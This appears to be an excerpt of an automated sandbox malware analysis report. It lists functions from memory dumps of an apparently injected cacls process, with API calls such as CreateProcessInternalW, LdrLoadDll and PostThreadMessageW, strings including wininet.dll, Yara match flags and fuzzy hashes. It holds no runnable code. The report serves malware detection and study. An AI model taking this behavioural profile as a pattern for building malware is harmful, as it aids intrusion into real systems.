                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                          • Associated: 00000007.00000002.3925432406.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3150000_cacls.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 82d161b95e5491ac05363f137f908701a86721a2f6a8724de9e18cd6b8f3c182
                                                          • Instruction ID: 562700bdc2a205fd09c3b5c502bc6f0409dde84d0856f88312acbe1e651e8bd9
                                                          • Opcode Fuzzy Hash: 82d161b95e5491ac05363f137f908701a86721a2f6a8724de9e18cd6b8f3c182
                                                          • Instruction Fuzzy Hash: DE900435311C1443D300F57C4D14F070015C7D5303F55D115F0155554CCF15CD715531
                                                          Function 031C2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                          • Associated: 00000007.00000002.3925432406.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3150000_cacls.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 4d6c5dd4c80077ba82584c49b2a40c601df44e0a5c21f7db2cdc79a59f25768c
                                                          • Instruction ID: 740afa6bc5a0151c36c31ce06c88fe15ffaaeddc9fbdbc6f3b5714c03b61076d
                                                          • Opcode Fuzzy Hash: 4d6c5dd4c80077ba82584c49b2a40c601df44e0a5c21f7db2cdc79a59f25768c
                                                          • Instruction Fuzzy Hash: E690022560141903D101B1584504616001A87D5241F95D022A1025555ECB258A92A131
                                                          Function 031C2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                          • Associated: 00000007.00000002.3925432406.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3150000_cacls.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: fd9787aeb50f1c6cd1cb070f66de66b2eb230f171fa2648d1c0d1b1b0cff2167
                                                          • Instruction ID: 68abb48020e70b0014dbbe737f4704db2e03933022dc2b0b36ce8c9bf0580811
                                                          • Opcode Fuzzy Hash: fd9787aeb50f1c6cd1cb070f66de66b2eb230f171fa2648d1c0d1b1b0cff2167
                                                          • Instruction Fuzzy Hash: BB90026520181803D140B5584904607001587D5302F55D011A2065555E8B298D516135
                                                          Function 031C2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                          • Associated: 00000007.00000002.3925432406.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3150000_cacls.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: f17b84cadf954b199115295c21f9537825861b6dfd3dede430916e0bb9d043ff
                                                          • Instruction ID: f09c9ec13f506b0adc7e64161151fc7a218226227849b063991a95959854026c
                                                          • Opcode Fuzzy Hash: f17b84cadf954b199115295c21f9537825861b6dfd3dede430916e0bb9d043ff
                                                          • Instruction Fuzzy Hash: 0790022D21341403D180B158550860A001587D6202F95E415A0016558CCB1589695321
                                                          Function 031C2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                          • Associated: 00000007.00000002.3925432406.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3150000_cacls.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 438172184bd3ad3c10ae75ba77614d58b3d7b584e390c3b580a5115d2859f052
                                                          • Instruction ID: 203109d91fc86715d78560159fe612427898bfca8f536e08160403f12daaf18b
                                                          • Opcode Fuzzy Hash: 438172184bd3ad3c10ae75ba77614d58b3d7b584e390c3b580a5115d2859f052
                                                          • Instruction Fuzzy Hash: 1990043530141403D140F15C551C7074015D7F7301F55F011F0415554CDF15CD575333
                                                          Function 031C2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                          • Associated: 00000007.00000002.3925432406.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3150000_cacls.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 1cc92cb9bc57352cb5c088cba84ed99237cccdb5fb218ccfbb88cf7120b0d3ed
                                                          • Instruction ID: 49e420974175fc1343429e3e52a0bb26210e71db548384807be01f152207f0a9
                                                          • Opcode Fuzzy Hash: 1cc92cb9bc57352cb5c088cba84ed99237cccdb5fb218ccfbb88cf7120b0d3ed
                                                          • Instruction Fuzzy Hash: 71900435343455535545F15C45045074017D7F53417D5D013F1415D50CC737DD57D731
                                                          Function 031C2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                          • Associated: 00000007.00000002.3925432406.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3150000_cacls.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 36c0e6c7a96ea7beab0eda5bed70c873fd0fb5a1f7c7de4d7483bc37061eb680
                                                          • Instruction ID: c2f8f1d8c3814d25423f2e943ea542f9d5b0acfa8d80b9d677112ff6801f4cd8
                                                          • Opcode Fuzzy Hash: 36c0e6c7a96ea7beab0eda5bed70c873fd0fb5a1f7c7de4d7483bc37061eb680
                                                          • Instruction Fuzzy Hash: B090023520141813D111B1584604707001987D5241F95D412A0425558D97568A52A121
                                                          Function 031C2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                          • Associated: 00000007.00000002.3925432406.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3150000_cacls.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 6fe5c10243e13eafd84843348a1f8a1f5bae3a9bb99c709f6fb555c0d6f81441
                                                          • Instruction ID: 07f8a95c283da0b8d737bafef2cf44ae05f3a7a0e4808c99c333b0659d2190e4
                                                          • Opcode Fuzzy Hash: 6fe5c10243e13eafd84843348a1f8a1f5bae3a9bb99c709f6fb555c0d6f81441
                                                          • Instruction Fuzzy Hash: 7C90023520149C03D110B158850474A001587D5301F59D411A4425658D879589917121
                                                          Function 031C2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                          • Associated: 00000007.00000002.3925432406.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3150000_cacls.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: a962989777c40848c56c0be561ea57dc9ab3a664edcf4b8d867b28f471246e9e
                                                          • Instruction ID: ca2e848b100b8fde3e8dad0434ed15fb8b9c6748eb854a87b7bccbba6e92be8b
                                                          • Opcode Fuzzy Hash: a962989777c40848c56c0be561ea57dc9ab3a664edcf4b8d867b28f471246e9e
                                                          • Instruction Fuzzy Hash: 6590043530141C43D100F15C4504F470015C7F5301F55D017F0135754DC715CD517531
                                                          Function 031C2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                          • Associated: 00000007.00000002.3925432406.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3150000_cacls.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: d8cfab51c73ec999c2aa58b12a0beeb90649ac686f4274119f79a42eb0835fb7
                                                          • Instruction ID: 1c71cecf6bbaa6d5d4c1a94c00abbdaa8430291eebdca9519153e079d4afc112
                                                          • Opcode Fuzzy Hash: d8cfab51c73ec999c2aa58b12a0beeb90649ac686f4274119f79a42eb0835fb7
                                                          • Instruction Fuzzy Hash: 1290023520141803D100B5985508646001587E5301F55E011A5025555EC76589916131
                                                          Function 031C35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                          • Associated: 00000007.00000002.3925432406.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3150000_cacls.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 2f55122a72468841df935fb8f0b05bf4fd632d9d298fd690158522ea54fa11e8
                                                          • Instruction ID: 61522353d13da1e6a99ce40d057d10ec2f451ba5dd576122dd1d2c0ea0fa5d4d
                                                          • Opcode Fuzzy Hash: 2f55122a72468841df935fb8f0b05bf4fd632d9d298fd690158522ea54fa11e8
                                                          • Instruction Fuzzy Hash: 7F90023560551803D100B1584614706101587D5201F65D411A0425568D87958A5165A2
                                                          Function 031C39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                          • Associated: 00000007.00000002.3925432406.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3150000_cacls.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 5b541049ccbd0a47ca45ad0fdf4666f785a14a3fbc7ebb9e9283b95309243c75
                                                          • Instruction ID: c12df08b88b4abb3dca2afe1b994f48010b45b6c8f43fcf13981d57722a5b9ea
                                                          • Opcode Fuzzy Hash: 5b541049ccbd0a47ca45ad0fdf4666f785a14a3fbc7ebb9e9283b95309243c75
                                                          • Instruction Fuzzy Hash: BD90043534547503D150F15C45047174015F7F5301F55D031F0C155D4DC755CD557331
                                                          Function 02753E10 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 108sleepCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 434 2753e10-2753e58 call 275b8d0 437 2753f64-2753f6a 434->437 438 2753e5e-2753ed8 call 275b9b0 call 2744890 call 27313e0 call 2751fe0 434->438 447 2753ee0-2753ef4 Sleep 438->447 448 2753f55-2753f5c 447->448 449 2753ef6-2753f08 447->449 448->447 450 2753f5e 448->450 451 2753f2a-2753f43 call 2756370 449->451 452 2753f0a-2753f28 call 27562d0 449->452 450->437 456 2753f48-2753f4b 451->456 452->456 456->448
                                                          APIs
                                                          • Sleep.KERNELBASE(000007D0), ref: 02753EEB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3923788481.0000000002730000.00000040.80000000.00040000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2730000_cacls.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: i:4$net.dll$wininet.dll
                                                          • API String ID: 3472027048-2634764057
                                                          • Opcode ID: 9c19912619b969d4492f2daff6b2ffbad7a51720dc2e438e4577885ffa5e0c71
                                                          • Instruction ID: 4badb3c72a8948bdf5476a1ac5201cad8b5ad50ab3cbec7487d4b3425059f75f
                                                          • Opcode Fuzzy Hash: 9c19912619b969d4492f2daff6b2ffbad7a51720dc2e438e4577885ffa5e0c71
                                                          • Instruction Fuzzy Hash: 5F316DB1A00705BBD715DFA4D884FEAF7B9AB88744F40815CAA5D6B280C7B06A40CBA0
                                                          Function 02740FFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117threadwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 457 2740ffc-2741016 458 2741019-2741054 457->458 459 27410b4-274110a call 2744890 call 27313e0 call 2751fe0 458->459 460 2741056 458->460 477 274110c-274111b PostThreadMessageW 459->477 478 274112a-2741130 459->478 462 2741057-2741058 460->462 464 2741084 462->464 465 274105a-274106c 462->465 464->462 466 2741085-2741087 464->466 465->458 473 274106e-2741075 465->473 468 2741091 466->468 469 2741089-2741090 466->469 469->468 475 2741077-2741080 473->475 476 2741082-2741083 473->476 475->476 476->464 477->478 479 274111d-2741127 477->479 479->478
                                                          APIs
                                                          • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 02741117
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3923788481.0000000002730000.00000040.80000000.00040000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2730000_cacls.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID: t577G2K6$t577G2K6
                                                          • API String ID: 1836367815-2667467881
                                                          • Opcode ID: ceb7c13abfd14f9acb328a3e78e0a1effc0617a5ff02d39070758dc8d71a7bed
                                                          • Instruction ID: a35cd2871bfb253427b4db217382f9af99a2bc7a985da5290d763f5453e088ee
                                                          • Opcode Fuzzy Hash: ceb7c13abfd14f9acb328a3e78e0a1effc0617a5ff02d39070758dc8d71a7bed
                                                          • Instruction Fuzzy Hash: CB31E172A022C47B8702EB759C42DEDBBA8EF4239475440A9ED48AB102DB3699438FD1
                                                          Function 02741097 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 480 2741097-27410b2 481 27410ba-27410d2 call 275c410 480->481 482 27410b5 call 275ba00 480->482 485 27410d8-274110a call 27313e0 call 2751fe0 481->485 486 27410d3 call 2744890 481->486 482->481 491 274110c-274111b PostThreadMessageW 485->491 492 274112a-2741130 485->492 486->485 491->492 493 274111d-2741127 491->493 493->492
                                                          APIs
                                                          • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 02741117
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3923788481.0000000002730000.00000040.80000000.00040000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2730000_cacls.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID: t577G2K6$t577G2K6
                                                          • API String ID: 1836367815-2667467881
                                                          • Opcode ID: 225896aef3f5f2ded065938a9608066204f4b1233ee5aa046c5d70eacc74819f
                                                          • Instruction ID: d0bfc2985e6b5f073ccfba1be9ca57c71c13f03ca500d0afa5cc79b0b9cff695
                                                          • Opcode Fuzzy Hash: 225896aef3f5f2ded065938a9608066204f4b1233ee5aa046c5d70eacc74819f
                                                          • Instruction Fuzzy Hash: 49112C71D0025C7EDB119BE48C81DEFBB7CDF012A4F008169FA48A7140E7745E068BA1
                                                          Function 027410A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 494 27410a0-27410d2 call 275ba00 call 275c410 499 27410d8-274110a call 27313e0 call 2751fe0 494->499 500 27410d3 call 2744890 494->500 505 274110c-274111b PostThreadMessageW 499->505 506 274112a-2741130 499->506 500->499 505->506 507 274111d-2741127 505->507 507->506
                                                          APIs
                                                          • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 02741117
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3923788481.0000000002730000.00000040.80000000.00040000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2730000_cacls.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID: t577G2K6$t577G2K6
                                                          • API String ID: 1836367815-2667467881
                                                          • Opcode ID: 0353cb2e23396fec2c33eb35837a01185db1fbe0d8a77d78faa4aa4f93364115
                                                          • Instruction ID: 9cf13598f569d6f729b74c26bce8956f1e0804942b773a2cf059102ccb957595
                                                          • Opcode Fuzzy Hash: 0353cb2e23396fec2c33eb35837a01185db1fbe0d8a77d78faa4aa4f93364115
                                                          • Instruction Fuzzy Hash: D7018871D0025C7ADB12A6E48C81DEFBB7CDF41694F448065FA58A7140E6745E058BB1
                                                          Function 0274F870 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3923788481.0000000002730000.00000040.80000000.00040000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2730000_cacls.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InitializeUninitialize
                                                          • String ID: @J7<
                                                          • API String ID: 3442037557-2016760708
                                                          • Opcode ID: 58fcf34726c1358f6274ab2e4884b5cd5ecb42eb9839d8182d394bc5e53a52cd
                                                          • Instruction ID: 7d0ee0ff85dd70e0ee4fd30103538e9808d5ada1c81071db1a205ee4040eea00
                                                          • Opcode Fuzzy Hash: 58fcf34726c1358f6274ab2e4884b5cd5ecb42eb9839d8182d394bc5e53a52cd
                                                          • Instruction Fuzzy Hash: 67313475A00609AFDB00DFD8C8809EFB7B9FF88304F104559E515E7214DB75EE058BA1
                                                          Function 0274F869 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3923788481.0000000002730000.00000040.80000000.00040000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2730000_cacls.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InitializeUninitialize
                                                          • String ID: @J7<
                                                          • API String ID: 3442037557-2016760708
                                                          • Opcode ID: 257f969a4aa80e5bec027f51d7631632e6c2a67b49a4ff1dd47c9b0a68ac93b6
                                                          • Instruction ID: 9448fd4d611b5677ea9b24871229462675cfe7ee4ed6a34a9e35f5355bee4fb9
                                                          • Opcode Fuzzy Hash: 257f969a4aa80e5bec027f51d7631632e6c2a67b49a4ff1dd47c9b0a68ac93b6
                                                          • Instruction Fuzzy Hash: 9A3134B5A00609AFDB10DFD8C8809EFB7B9FF88304B108559E515EB214DB75EE45CBA1
                                                          Function 027484EA Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00008003,?,?,02742040,0275834F,02755A0E,02742006), ref: 027484E3
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3923788481.0000000002730000.00000040.80000000.00040000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2730000_cacls.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: 4e02e0d7e3b3a53fe3a078bdd5fcac6e3ec5e91085e971d8e4e24b2f4b3ac688
                                                          • Instruction ID: 7c35816a6f37c8b4739efa6fcac34fd0c7da7ab6facbd84459a4680260eefb64
                                                          • Opcode Fuzzy Hash: 4e02e0d7e3b3a53fe3a078bdd5fcac6e3ec5e91085e971d8e4e24b2f4b3ac688
                                                          • Instruction Fuzzy Hash: 20110A71A103187BEB11EBA4DC49FEA7379DB45364F004298FD0C97181EB70A6448B92
                                                          Function 02744890 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02744902
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3923788481.0000000002730000.00000040.80000000.00040000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2730000_cacls.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: 2afde102f9fe6f510f505a2d4b696e440cfae529a922d3c4672bbfa4d12d4071
                                                          • Instruction ID: 690b3d03ff24050e1a5cb0e5a641732b7354a2cdc99d2f5c686642e4af93c299
                                                          • Opcode Fuzzy Hash: 2afde102f9fe6f510f505a2d4b696e440cfae529a922d3c4672bbfa4d12d4071
                                                          • Instruction Fuzzy Hash: F7011EB5D0020DABDF11EAE4DC45F9DB7B9AB44308F1041A9ED1897241FA71EB14DB91
                                                          Function 02759C70 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessInternalW.KERNELBASE(?,?,?,?,0274867E,00000010,?,?,?,00000044,?,00000010,0274867E,?,?,?), ref: 02759CD0
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3923788481.0000000002730000.00000040.80000000.00040000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2730000_cacls.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateInternalProcess
                                                          • String ID:
                                                          • API String ID: 2186235152-0
                                                          • Opcode ID: 53127c51fb8e915e2ada1bd4b1e5bd03c96a5b42473f202cca94c82170286ba0
                                                          • Instruction ID: 406acff1ee81f023fb620d33458f62d7ca2c11555d17470c53684c5e23b0a643
                                                          • Opcode Fuzzy Hash: 53127c51fb8e915e2ada1bd4b1e5bd03c96a5b42473f202cca94c82170286ba0
                                                          • Instruction Fuzzy Hash: AD0180B6214208BBCB44DF99DC80EDB77AEAF8D754F508608BA19A3241D670F851CBA4
                                                          Function 02744958 Relevance: 1.5, APIs: 1, Instructions: 43libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02744902
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3923788481.0000000002730000.00000040.80000000.00040000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2730000_cacls.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: 3ecf082fedf959eed90aedf2510164954cb22344a25520f17983f10a877f4610
                                                          • Instruction ID: 1baee9d3ec8b482799299f01a396b395a1dd830fab4d55705accaa4bfc1022c3
                                                          • Opcode Fuzzy Hash: 3ecf082fedf959eed90aedf2510164954cb22344a25520f17983f10a877f4610
                                                          • Instruction Fuzzy Hash: 5FF0AC31E84208CFDB00CFE8DC52BD8B3B0FB46618F1406D9DE088B241E7626656DB45
                                                          Function 02739DF0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02739E35
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3923788481.0000000002730000.00000040.80000000.00040000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2730000_cacls.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          • Opcode ID: 8abc526603ee69cc07ae379c75a4a6867cf3df2a5e9c00712d5c962cde03cd73
                                                          • Instruction ID: 671c6e6a39bceac9fe4342dac016fbe5e2eff96039a67c4178738d1ba18483d9
                                                          • Opcode Fuzzy Hash: 8abc526603ee69cc07ae379c75a4a6867cf3df2a5e9c00712d5c962cde03cd73
